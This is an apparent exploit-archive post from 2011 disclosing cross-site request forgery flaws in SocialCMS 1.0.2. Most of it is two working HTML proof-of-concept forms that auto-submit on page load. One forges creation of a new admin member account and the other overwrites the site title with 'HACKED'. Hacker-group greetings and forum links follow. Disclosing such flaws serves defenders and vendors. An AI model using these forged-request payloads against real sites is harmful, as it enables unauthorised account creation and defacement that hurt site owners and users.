SocialCMS1.0.2 Multiple CSRF Vulnerabilities

2011-04-20 15:15:03

<!---
Title: socialcms1.0.2 Multiple CSRF Vulnerabilities
Author: vir0e5 a.k.a banditc0de <[email protected]>
Date: Wed 20 april 2011 11:18:22 AM
Vendor: www.socialcms.com
Download: http://sourceforge.net/projects/socialcms/
--->

<!-- Create Admin User -->

<body onload='document.csrf.submit()'>
<form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_members.php?action=member_new&page=1&mID=1" class="form">
<p><input type="hidden" name="TR_login_name" value="vir0e5"></p>
<p><input type="hidden" name="TR_firstname" value="bandit"></p>
<p><input type="hidden" name="TR_lastname" value="c0de"/></p>
<p><input type="hidden" name="TREF_email_address" value="[email protected]"/></p>
<p><input type="hidden" name="TR_group_level" value=""/></p>
<input type="hidden" name="update" value="update" type="submit" />
</form>
</body>

<!-- Default site title -->
<body onload='document.csrf.submit()'>
<form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_configuration.php?gid=1&id=36&action=save" class="form">
<p><input type="hidden" name="TR_configuration_title" value="Default site title"></p>
<p><input type="hidden" name="TR_configuration_name" value="CSRF VULN"></p>
<p><input type="hidden" name="TR_configuration_value" value="HACKED"/></p>
<p><input type="hidden" name="configuration_description" value="CSRF"/></p>
<p><input type="hidden" name="IN_configuration_priority" value="0"/></p>
<input type="hidden" name="update" value="update" type="submit" />
</form>

****************-------**DCI2k7**--------*****************
[+] Greetings :[ mywisdom - kiddies - kamtiez - r3m1ck - aciz_n1nj4 | mozartklik |syafm0vic-

skuteng_boy - blue_screen - agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org |

http://devilzc0de.org | http://santricyber.org | http://indonesiancoder.com |

http://cyber4rt.com And OTHER's

Cause i'm Alone!!

Fixes

No fixes

In order to submit a new fix you need to be registered.